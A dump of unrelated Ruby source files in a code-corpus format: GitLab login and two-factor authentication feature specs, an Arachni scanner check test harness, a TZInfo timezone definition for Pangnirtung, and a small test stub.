expect(authentication_metrics).to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(page).not_to have_content(I18n.t('devise.failure.unconfirmed'))
expect(page).not_to have_link('Resend confirmation email', href: new_user_confirmation_path)
end
end
context 'when the confirmation grace period is expired' do
it 'prevents the user from logging in and renders a resend confirmation email link' do
travel_to((grace_period + 1.day).from_now) do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
gitlab_sign_in(user)
expect(page).to have_content(I18n.t('devise.failure.unconfirmed'))
expect(page).to have_link('Resend confirmation email', href: new_user_confirmation_path)
end
end
end
end
describe 'with the ghost user' do
it 'disallows login' do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_password_invalid_counter)
gitlab_sign_in(User.ghost)
expect(page).to have_content('Invalid login or password.')
end
it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_password_invalid_counter)
expect { gitlab_sign_in(User.ghost) }
.not_to change { User.ghost.reload.sign_in_count }
end
end
describe 'with two-factor authentication', :js do
def enter_code(code)
fill_in 'user_otp_attempt', with: code
click_button 'Verify code'
end
context 'with valid username/password' do
let(:user) { create(:user, :two_factor) }
before do
gitlab_sign_in(user, remember: true)
expect(page).to have_content('Two-Factor Authentication')
end
it 'does not show a "You are already signed in." error message' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code(user.current_otp)
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'does not allow sign-in if the user password is updated before entering a one-time code' do
user.update!(password: 'new_password')
enter_code(user.current_otp)
expect(page).to have_content('An error occurred. Please sign in again.')
end
context 'using one-time code' do
it 'allows login with valid code' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code(user.current_otp)
expect(current_path).to eq root_path
end
it 'persists remember_me value via hidden field' do
field = first('input#user_remember_me', visible: false)
expect(field.value).to eq '1'
end
it 'blocks login with invalid code' do
# TODO invalid 2FA code does not generate any events
# See gitlab-org/gitlab-ce#49785
enter_code('foo')
expect(page).to have_content('Invalid two-factor code')
end
it 'allows login with invalid code, then valid code' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code('foo')
expect(page).to have_content('Invalid two-factor code')
enter_code(user.current_otp)
expect(current_path).to eq root_path
end
it 'triggers ActiveSession.cleanup for the user' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
enter_code(user.current_otp)
end
end
context 'using backup code' do
let(:codes) { user.generate_otp_backup_codes! }
before do
expect(codes.size).to eq 10
# Ensure the generated codes get saved
user.save!(touch: false)
end
context 'with valid code' do
it 'allows login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code(codes.sample)
expect(current_path).to eq root_path
end
it 'invalidates the used code' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect { enter_code(codes.sample) }
.to change { user.reload.otp_backup_codes.size }.by(-1)
end
it 'invalidates backup codes twice in a row' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter).twice
.and increment(:user_two_factor_authenticated_counter).twice
.and increment(:user_session_destroyed_counter)
random_code = codes.delete(codes.sample)
expect { enter_code(random_code) }
.to change { user.reload.otp_backup_codes.size }.by(-1)
gitlab_sign_out
gitlab_sign_in(user)
expect { enter_code(codes.sample) }
.to change { user.reload.otp_backup_codes.size }.by(-1)
end
it 'triggers ActiveSession.cleanup for the user' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
enter_code(codes.sample)
end
end
context 'with invalid code' do
it 'blocks login' do
# TODO, invalid two factor authentication does not increment
# metrics / counters, see gitlab-org/gitlab-ce#49785
code = codes.sample
expect(user.invalidate_otp_backup_code!(code)).to eq true
user.save!(touch: false)
expect(user.reload.otp_backup_codes.size).to eq 9
enter_code(code)
expect(page).to have_content('Invalid two-factor code.')
end
end
end
end
context 'when logging in via OAuth' do
let(:user) { create(:omniauth_user, :two_factor, extern_uid: 'my-uid', provider: 'saml')}
let(:mock_saml_response) do
File.read('spec/fixtures/authentication/saml_response.xml')
end
before do
stub_omniauth_saml_config(enabled: true, auto_link_saml_user: true, allow_single_sign_on: ['saml'],
providers: [mock_saml_config_with_upstream_two_factor_authn_contexts])
end
context 'when authn_context is worth two factors' do
let(:mock_saml_response) do
File.read('spec/fixtures/authentication/saml_response.xml')
.gsub('urn:oasis:names:tc:SAML:2.0:ac:classes:Password',
'urn:oasis:names:tc:SAML:2.0:ac:classes:SecondFactorOTPSMS')
end
it 'signs user in without prompting for second factor' do
# TODO, OAuth authentication does not fire events,
# see gitlab-org/gitlab-ce#49786
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
sign_in_using_saml!
expect(page).not_to have_content('Two-Factor Authentication')
expect(current_path).to eq root_path
end
end
context 'when two factor authentication is required' do
it 'shows 2FA prompt after OAuth login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
sign_in_using_saml!
expect(page).to have_content('Two-Factor Authentication')
enter_code(user.current_otp)
expect(current_path).to eq root_path
end
end
def sign_in_using_saml!
gitlab_sign_in_via('saml', user, 'my-uid', mock_saml_response)
end
end
end
describe 'without two-factor authentication' do
context 'with correct username and password' do
let(:user) { create(:user) }
it 'allows basic login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq root_path
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'does not show already signed in message when opening sign in page after login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
visit new_user_session_path
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'triggers ActiveSession.cleanup for the user' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
gitlab_sign_in(user)
end
context 'when the users password is expired' do
before do
user.update!(password_expires_at: Time.parse('2018-05-08 11:29:46 UTC'))
end
it 'asks for a new password' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect(current_path).to eq(new_profile_password_path)
end
end
end
context 'with invalid username and password' do
let(:user) { create(:user, password: 'not-the-default') }
it 'blocks invalid login' do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_password_invalid_counter)
gitlab_sign_in(user)
expect(page).to have_content('Invalid login or password.')
end
end
end
describe 'with required two-factor authentication enabled' do
let(:user) { create(:user) }
# TODO: otp_grace_period_started_at
context 'global setting' do
before do
stub_application_setting(require_two_factor_authentication: true)
end
context 'with grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 48)
end
context 'within the grace period' do
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content('The global settings require you to enable Two-Factor Authentication for your account. You need to do this before ')
end
it 'allows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
click_link 'Configure it later'
expect(current_path).to eq root_path
end
end
context 'after the grace period' do
let(:user) { create(:user, otp_grace_period_started_at: 9999.hours.ago) }
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The global settings require you to enable Two-Factor Authentication for your account.'
)
end
it 'disallows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).not_to have_link('Configure it later')
end
end
end
context 'without grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 0)
end
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The global settings require you to enable Two-Factor Authentication for your account.'
)
end
end
end
context 'group setting' do
before do
group1 = create :group, name: 'Group 1', require_two_factor_authentication: true
group1.add_user(user, GroupMember::DEVELOPER)
group2 = create :group, name: 'Group 2', require_two_factor_authentication: true
group2.add_user(user, GroupMember::DEVELOPER)
end
context 'with grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 48)
end
context 'within the grace period' do
it 'redirects to two-factor configuration page' do
freeze_time do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The group settings for Group 1 and Group 2 require you to enable '\
'Two-Factor Authentication for your account. '\
'You can leave Group 1 and leave Group 2. '\
'You need to do this '\
'before '\
"#{(Time.zone.now + 2.days).strftime("%a, %d %b %Y %H:%M:%S %z")}"
)
end
end
it 'allows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
click_link 'Configure it later'
expect(current_path).to eq root_path
end
end
context 'after the grace period' do
let(:user) { create(:user, otp_grace_period_started_at: 9999.hours.ago) }
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The group settings for Group 1 and Group 2 require you to enable ' \
'Two-Factor Authentication for your account.'
)
end
it 'disallows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).not_to have_link('Configure it later')
end
end
end
context 'without grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 0)
end
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The group settings for Group 1 and Group 2 require you to enable ' \
'Two-Factor Authentication for your account. '\
'You can leave Group 1 and leave Group 2.'
)
end
end
end
end
describe 'UI tabs and panes' do
context 'when no defaults are changed' do
it 'does not render any tabs' do
visit new_user_session_path
ensure_no_tabs
end
it 'renders link to sign up path' do
visit new_user_session_path
expect(page.body).to have_link('Register now', href: new_user_registration_path)
end
end
context 'when signup is disabled' do
before do
stub_application_setting(signup_enabled: false)
visit new_user_session_path
end
it 'does not render any tabs' do
ensure_no_tabs
end
it 'does not render link to sign up path' do
visit new_user_session_path
expect(page.body).not_to have_link('Register now', href: new_user_registration_path)
end
end
context 'when ldap is enabled' do
include LdapHelpers
let(:provider) { 'ldapmain' }
let(:ldap_server_config) do
{
'label' => 'Main LDAP',
'provider_name' => provider,
'attributes' => {},
'encryption' => 'plain',
'uid' => 'uid',
'base' => 'dc=example,dc=com'
}
end
before do
stub_ldap_setting(enabled: true)
allow(::Gitlab::Auth::Ldap::Config).to receive_messages(enabled: true, servers: [ldap_server_config])
allow(Gitlab::Auth::OAuth::Provider).to receive_messages(providers: [provider.to_sym])
Ldap::OmniauthCallbacksController.define_providers!
Rails.application.reload_routes!
allow_next_instance_of(ActionDispatch::Routing::RoutesProxy) do |instance|
allow(instance).to receive(:"user_#{provider}_omniauth_callback_path")
.and_return("/users/auth/#{provider}/callback")
end
visit new_user_session_path
end
it 'correctly renders tabs and panes' do
ensure_tab_pane_correctness(['Main LDAP', 'Standard'])
end
it 'renders link to sign up path' do
expect(page.body).to have_link('Register now', href: new_user_registration_path)
end
end
context 'when crowd is enabled' do
before do
allow(Gitlab::Auth::OAuth::Provider).to receive_messages(providers: [:crowd])
stub_application_setting(crowd_enabled: true)
Ldap::OmniauthCallbacksController.define_providers!
Rails.application.reload_routes!
allow_next_instance_of(ActionDispatch::Routing::RoutesProxy) do |instance|
allow(instance).to receive(:user_crowd_omniauth_authorize_path)
.and_return("/users/auth/crowd/callback")
end
visit new_user_session_path
end
it 'correctly renders tabs and panes' do
ensure_tab_pane_correctness(%w(Crowd Standard))
end
end
end
describe 'Client helper classes and flags' do
it 'adds client browser and platform classes to page body' do
visit root_path
expect(find('body')[:class]).to include('gl-browser-generic')
expect(find('body')[:class]).to include('gl-platform-other')
end
end
context 'when terms are enforced' do
let(:user) { create(:user) }
before do
enforce_terms
end
it 'asks to accept the terms on first login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(root_path)
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'does not ask for terms when the user already accepted them' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
accept_terms(user)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect(current_path).to eq(root_path)
end
context 'when 2FA is required for the user' do
before do
group = create(:group, require_two_factor_authentication: true)
group.add_developer(user)
end
context 'when the user did not enable 2FA' do
it 'asks to set 2FA before asking to accept the terms', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(profile_two_factor_auth_path)
fill_in 'pin_code', with: user.reload.current_otp
click_button 'Register with two-factor app'
click_button 'Copy codes'
click_link 'Proceed'
expect(current_path).to eq(profile_account_path)
expect(page).to have_content('You have set up 2FA for your account! If you lose access to your 2FA device, you can use your recovery codes to access your account. Alternatively, if you upload an SSH key, you can use that key to generate additional recovery codes.')
end
end
context 'when the user already enabled 2FA' do
before do
user.update!(otp_required_for_login: true,
otp_secret: User.generate_otp_secret(32))
end
it 'asks the user to accept the terms' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
fill_in 'user_otp_attempt', with: user.reload.current_otp
click_button 'Verify code'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(root_path)
end
end
end
context 'when the users password is expired' do
before do
user.update!(password_expires_at: Time.parse('2018-05-08 11:29:46 UTC'))
end
it 'asks the user to accept the terms before setting a new password' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(new_profile_password_path)
fill_in 'user_current_password', with: '12345678'
fill_in 'user_password', with: 'new password'
fill_in 'user_password_confirmation', with: 'new password'
click_button 'Set new password'
expect(page).to have_content('Password successfully changed')
end
end
context 'when the user does not have an email configured' do
let(:user) { create(:omniauth_user, extern_uid: 'my-uid', provider: 'saml', email: '[email protected]') }
before do
stub_omniauth_saml_config(enabled: true, auto_link_saml_user: true, allow_single_sign_on: ['saml'], providers: [mock_saml_config])
end
it 'asks the user to accept the terms before setting an email' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in_via('saml', user, 'my-uid')
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(profile_path)
fill_in 'Email', with: '[email protected]'
click_button 'Update profile settings'
expect(page).to have_content('Profile was successfully updated')
end
end
end
context 'when sending confirmation email and not yet confirmed' do
let!(:user) { create(:user, confirmed_at: nil) }
let(:grace_period) { 2.days }
before do
stub_application_setting(send_user_confirmation_email: true)
stub_feature_flags(soft_email_confirmation: true)
allow(User).to receive(:allow_unconfirmed_access_for).and_return grace_period
end
it 'allows login and shows a flash warning to confirm the email address' do
expect(authentication_metrics).to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq root_path
expect(page).to have_content("Please check your email (#{user.email}) to verify that you own this address and unlock the power of CI/CD.")
end
context "when not having confirmed within Devise's allow_unconfirmed_access_for time" do
it 'does not allow login and shows a flash alert to confirm the email address' do
travel_to((grace_period + 1.day).from_now) do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
gitlab_sign_in(user)
expect(current_path).to eq new_user_session_path
expect(page).to have_content(I18n.t('devise.failure.unconfirmed'))
end
end
end
end
end
| 32.641758 | 275 | 0.657151 |
ffce350a2bcdd5cc830046d74bef1554c5313f62 | 5,164 | shared_examples_for 'check' do
include_examples 'component'
module Format
include Arachni::Element::Capabilities::Mutable::Format
end
module Element
include Arachni::Element
end
module Severity
include Arachni::Severity
end
before( :all ) do
@issues = []
@url = url
@name = name
end
before( :each ) do
reset_framework
options.url = @url
framework.checks.load @name
# Do not deduplicate, the check tests need to see everything.
current_check.instance_eval { define_method( :skip? ) { |_| false } }
Arachni::Data.issues.do_not_store
Arachni::Data.issues.on_new_pre_deduplication do |issue|
@issues << issue
# Leave this here, helps us save every kind of issue in order to test
# the reporters.
if $spec_issues
$spec_issues << issue
end
end
Arachni::Element::Capabilities::Analyzable::Timeout.do_not_deduplicate
end
after( :each ) do
@issues.clear
process_kill_reactor
framework.reset
end
describe '.info' do
it 'holds the right platforms' do
current_check.platforms.sort.should == self.class.platforms.sort
end
it 'holds the right elements' do
current_check.info[:elements].map(&:to_s).sort.should ==
self.class.elements.map(&:to_s).sort
end
end
def self.easy_test( run_checks = true, &block )
if self.platforms.any?
context 'when the platform is' do
platforms.each do |platform|
test_platform( platform, run_checks, &block )
end
end
else
elements.each do |element|
test_element( element, nil, run_checks, &block )
end
end
end
def self.test_platform( platform, run_checks, &block )
context platform do
elements.each do |element|
test_element( element, platform, run_checks, &block )
end
end
end
def self.test_element( element, platform, run_checks, &block )
it "logs vulnerable #{element.type} elements" do
run_test element, platform, run_checks, &block
end
end
def run_test( element, platform, run_checks, &block )
if !issue_count && !issue_count_per_platform &&
!issue_count_per_element && !issue_count_per_element_per_platform
raise 'No issue count provided via a suitable method.'
end
options.url = url + platform.to_s
options.scope.include_path_patterns = options.url
audit element, run_checks
if issue_count
issues.size.should == issue_count
end
if issue_count_per_platform
issues.size.should ==
issue_count_per_platform[platform]
end
if issue_count_per_element
issues.size.should == issue_count_per_element[element]
end
if issue_count_per_element_per_platform
issues.size.should ==
issue_count_per_element_per_platform[platform][element]
end
instance_eval &block if block_given?
end
def issues
@issues
end
def issue_count
end
def issue_count_per_platform
end
def issue_count_per_element
end
def issue_count_per_element_per_platform
end
def self.platforms
[]
end
def self.elements
end
def audit( element_type, logs_issues = true )
if !element_type.is_a?( Symbol )
element_type = element_type.type
end
options.audit.skip_elements :links, :forms, :cookies, :headers, :link_templates
if element_type.to_s.start_with? 'link_template'
options.audit.link_templates = [
/\/input\/(?<input>.+)\//,
/input\|(?<input>.+)/
]
else
options.audit.elements element_type rescue NoMethodError
end
run
e = element_type.to_s
e << 's' if element_type.to_s[-1] != 's'
e = element_type.to_s
e = e[0...-1] if element_type.to_s[-1] == 's'
if logs_issues && issues.any?
# make sure we ONLY got results for the requested element type
issues.map { |i| i.vector.class.type }.uniq.should == [e.to_sym]
if current_check.info[:issue]
issues.map { |i| i.severity }.uniq.should ==
[current_check.info[:issue][:severity]]
end
end
end
def current_check
framework.checks.values.first
end
def url
@url ||= (
begin
web_server_url_for( "#{name}_check" )
rescue
begin
web_server_url_for( name )
rescue
web_server_url_for( "#{name}_https" )
end
end
) + '/'
end
end
| 25.949749 | 87 | 0.562355 |
accca9e1aa491e9be4f577def88a9ebee071820b | 70 | require 'test/unit'
class LocalizameTest < Test::Unit::TestCase
end
| 11.666667 | 43 | 0.757143 |
1d5a582a44681c32c9661863482dab89deae0bfb | 10,628 | # encoding: UTF-8
# This file contains data derived from the IANA Time Zone Database
# (http://www.iana.org/time-zones).
module TZInfo
module Data
module Definitions
module America
module Pangnirtung
include TimezoneDefinition
timezone 'America/Pangnirtung' do |tz|
tz.offset :o0, 0, 0, :zzz
tz.offset :o1, -14400, 0, :AST
tz.offset :o2, -14400, 3600, :AWT
tz.offset :o3, -14400, 3600, :APT
tz.offset :o4, -14400, 7200, :ADDT
tz.offset :o5, -14400, 3600, :ADT
tz.offset :o6, -18000, 3600, :EDT
tz.offset :o7, -18000, 0, :EST
tz.offset :o8, -21600, 0, :CST
tz.offset :o9, -21600, 3600, :CDT
tz.transition 1921, 1, :o1, -1546300800, 4845381, 2
tz.transition 1942, 2, :o2, -880221600, 9721599, 4
tz.transition 1945, 8, :o3, -769395600, 58360379, 24
tz.transition 1945, 9, :o1, -765399600, 58361489, 24
tz.transition 1965, 4, :o4, -147902400, 7316627, 3
tz.transition 1965, 10, :o1, -131572800, 7317194, 3
tz.transition 1980, 4, :o5, 325663200
tz.transition 1980, 10, :o1, 341384400
tz.transition 1981, 4, :o5, 357112800
tz.transition 1981, 10, :o1, 372834000
tz.transition 1982, 4, :o5, 388562400
tz.transition 1982, 10, :o1, 404888400
tz.transition 1983, 4, :o5, 420012000
tz.transition 1983, 10, :o1, 436338000
tz.transition 1984, 4, :o5, 452066400
tz.transition 1984, 10, :o1, 467787600
tz.transition 1985, 4, :o5, 483516000
tz.transition 1985, 10, :o1, 499237200
tz.transition 1986, 4, :o5, 514965600
tz.transition 1986, 10, :o1, 530686800
tz.transition 1987, 4, :o5, 544600800
tz.transition 1987, 10, :o1, 562136400
tz.transition 1988, 4, :o5, 576050400
tz.transition 1988, 10, :o1, 594190800
tz.transition 1989, 4, :o5, 607500000
tz.transition 1989, 10, :o1, 625640400
tz.transition 1990, 4, :o5, 638949600
tz.transition 1990, 10, :o1, 657090000
tz.transition 1991, 4, :o5, 671004000
tz.transition 1991, 10, :o1, 688539600
tz.transition 1992, 4, :o5, 702453600
tz.transition 1992, 10, :o1, 719989200
tz.transition 1993, 4, :o5, 733903200
tz.transition 1993, 10, :o1, 752043600
tz.transition 1994, 4, :o5, 765352800
tz.transition 1994, 10, :o1, 783493200
tz.transition 1995, 4, :o6, 796802400
tz.transition 1995, 10, :o7, 814946400
tz.transition 1996, 4, :o6, 828860400
tz.transition 1996, 10, :o7, 846396000
tz.transition 1997, 4, :o6, 860310000
tz.transition 1997, 10, :o7, 877845600
tz.transition 1998, 4, :o6, 891759600
tz.transition 1998, 10, :o7, 909295200
tz.transition 1999, 4, :o6, 923209200
tz.transition 1999, 10, :o8, 941349600
tz.transition 2000, 4, :o9, 954662400
tz.transition 2000, 10, :o7, 972802800
tz.transition 2001, 4, :o6, 986108400
tz.transition 2001, 10, :o7, 1004248800
tz.transition 2002, 4, :o6, 1018162800
tz.transition 2002, 10, :o7, 1035698400
tz.transition 2003, 4, :o6, 1049612400
tz.transition 2003, 10, :o7, 1067148000
tz.transition 2004, 4, :o6, 1081062000
tz.transition 2004, 10, :o7, 1099202400
tz.transition 2005, 4, :o6, 1112511600
tz.transition 2005, 10, :o7, 1130652000
tz.transition 2006, 4, :o6, 1143961200
tz.transition 2006, 10, :o7, 1162101600
tz.transition 2007, 3, :o6, 1173596400
tz.transition 2007, 11, :o7, 1194156000
tz.transition 2008, 3, :o6, 1205046000
tz.transition 2008, 11, :o7, 1225605600
tz.transition 2009, 3, :o6, 1236495600
tz.transition 2009, 11, :o7, 1257055200
tz.transition 2010, 3, :o6, 1268550000
tz.transition 2010, 11, :o7, 1289109600
tz.transition 2011, 3, :o6, 1299999600
tz.transition 2011, 11, :o7, 1320559200
tz.transition 2012, 3, :o6, 1331449200
tz.transition 2012, 11, :o7, 1352008800
tz.transition 2013, 3, :o6, 1362898800
tz.transition 2013, 11, :o7, 1383458400
tz.transition 2014, 3, :o6, 1394348400
tz.transition 2014, 11, :o7, 1414908000
tz.transition 2015, 3, :o6, 1425798000
tz.transition 2015, 11, :o7, 1446357600
tz.transition 2016, 3, :o6, 1457852400
tz.transition 2016, 11, :o7, 1478412000
tz.transition 2017, 3, :o6, 1489302000
tz.transition 2017, 11, :o7, 1509861600
tz.transition 2018, 3, :o6, 1520751600
tz.transition 2018, 11, :o7, 1541311200
tz.transition 2019, 3, :o6, 1552201200
tz.transition 2019, 11, :o7, 1572760800
tz.transition 2020, 3, :o6, 1583650800
tz.transition 2020, 11, :o7, 1604210400
tz.transition 2021, 3, :o6, 1615705200
tz.transition 2021, 11, :o7, 1636264800
tz.transition 2022, 3, :o6, 1647154800
tz.transition 2022, 11, :o7, 1667714400
tz.transition 2023, 3, :o6, 1678604400
tz.transition 2023, 11, :o7, 1699164000
tz.transition 2024, 3, :o6, 1710054000
tz.transition 2024, 11, :o7, 1730613600
tz.transition 2025, 3, :o6, 1741503600
tz.transition 2025, 11, :o7, 1762063200
tz.transition 2026, 3, :o6, 1772953200
tz.transition 2026, 11, :o7, 1793512800
tz.transition 2027, 3, :o6, 1805007600
tz.transition 2027, 11, :o7, 1825567200
tz.transition 2028, 3, :o6, 1836457200
tz.transition 2028, 11, :o7, 1857016800
tz.transition 2029, 3, :o6, 1867906800
tz.transition 2029, 11, :o7, 1888466400
tz.transition 2030, 3, :o6, 1899356400
tz.transition 2030, 11, :o7, 1919916000
tz.transition 2031, 3, :o6, 1930806000
tz.transition 2031, 11, :o7, 1951365600
tz.transition 2032, 3, :o6, 1962860400
tz.transition 2032, 11, :o7, 1983420000
tz.transition 2033, 3, :o6, 1994310000
tz.transition 2033, 11, :o7, 2014869600
tz.transition 2034, 3, :o6, 2025759600
tz.transition 2034, 11, :o7, 2046319200
tz.transition 2035, 3, :o6, 2057209200
tz.transition 2035, 11, :o7, 2077768800
tz.transition 2036, 3, :o6, 2088658800
tz.transition 2036, 11, :o7, 2109218400
tz.transition 2037, 3, :o6, 2120108400
tz.transition 2037, 11, :o7, 2140668000
tz.transition 2038, 3, :o6, 2152162800, 59171923, 24
tz.transition 2038, 11, :o7, 2172722400, 9862939, 4
tz.transition 2039, 3, :o6, 2183612400, 59180659, 24
tz.transition 2039, 11, :o7, 2204172000, 9864395, 4
tz.transition 2040, 3, :o6, 2215062000, 59189395, 24
tz.transition 2040, 11, :o7, 2235621600, 9865851, 4
tz.transition 2041, 3, :o6, 2246511600, 59198131, 24
tz.transition 2041, 11, :o7, 2267071200, 9867307, 4
tz.transition 2042, 3, :o6, 2277961200, 59206867, 24
tz.transition 2042, 11, :o7, 2298520800, 9868763, 4
tz.transition 2043, 3, :o6, 2309410800, 59215603, 24
tz.transition 2043, 11, :o7, 2329970400, 9870219, 4
tz.transition 2044, 3, :o6, 2341465200, 59224507, 24
tz.transition 2044, 11, :o7, 2362024800, 9871703, 4
tz.transition 2045, 3, :o6, 2372914800, 59233243, 24
tz.transition 2045, 11, :o7, 2393474400, 9873159, 4
tz.transition 2046, 3, :o6, 2404364400, 59241979, 24
tz.transition 2046, 11, :o7, 2424924000, 9874615, 4
tz.transition 2047, 3, :o6, 2435814000, 59250715, 24
tz.transition 2047, 11, :o7, 2456373600, 9876071, 4
tz.transition 2048, 3, :o6, 2467263600, 59259451, 24
tz.transition 2048, 11, :o7, 2487823200, 9877527, 4
tz.transition 2049, 3, :o6, 2499318000, 59268355, 24
tz.transition 2049, 11, :o7, 2519877600, 9879011, 4
tz.transition 2050, 3, :o6, 2530767600, 59277091, 24
tz.transition 2050, 11, :o7, 2551327200, 9880467, 4
tz.transition 2051, 3, :o6, 2562217200, 59285827, 24
tz.transition 2051, 11, :o7, 2582776800, 9881923, 4
tz.transition 2052, 3, :o6, 2593666800, 59294563, 24
tz.transition 2052, 11, :o7, 2614226400, 9883379, 4
tz.transition 2053, 3, :o6, 2625116400, 59303299, 24
tz.transition 2053, 11, :o7, 2645676000, 9884835, 4
tz.transition 2054, 3, :o6, 2656566000, 59312035, 24
tz.transition 2054, 11, :o7, 2677125600, 9886291, 4
tz.transition 2055, 3, :o6, 2688620400, 59320939, 24
tz.transition 2055, 11, :o7, 2709180000, 9887775, 4
tz.transition 2056, 3, :o6, 2720070000, 59329675, 24
tz.transition 2056, 11, :o7, 2740629600, 9889231, 4
tz.transition 2057, 3, :o6, 2751519600, 59338411, 24
tz.transition 2057, 11, :o7, 2772079200, 9890687, 4
tz.transition 2058, 3, :o6, 2782969200, 59347147, 24
tz.transition 2058, 11, :o7, 2803528800, 9892143, 4
tz.transition 2059, 3, :o6, 2814418800, 59355883, 24
tz.transition 2059, 11, :o7, 2834978400, 9893599, 4
tz.transition 2060, 3, :o6, 2846473200, 59364787, 24
tz.transition 2060, 11, :o7, 2867032800, 9895083, 4
tz.transition 2061, 3, :o6, 2877922800, 59373523, 24
tz.transition 2061, 11, :o7, 2898482400, 9896539, 4
tz.transition 2062, 3, :o6, 2909372400, 59382259, 24
tz.transition 2062, 11, :o7, 2929932000, 9897995, 4
tz.transition 2063, 3, :o6, 2940822000, 59390995, 24
tz.transition 2063, 11, :o7, 2961381600, 9899451, 4
tz.transition 2064, 3, :o6, 2972271600, 59399731, 24
tz.transition 2064, 11, :o7, 2992831200, 9900907, 4
end
end
end
end
end
end
| 51.342995 | 66 | 0.575461 |
7907b8d9c9078119bbea3f5fa9300c59a516710f | 1,191 | =begin
#Selling Partner API for Authorization
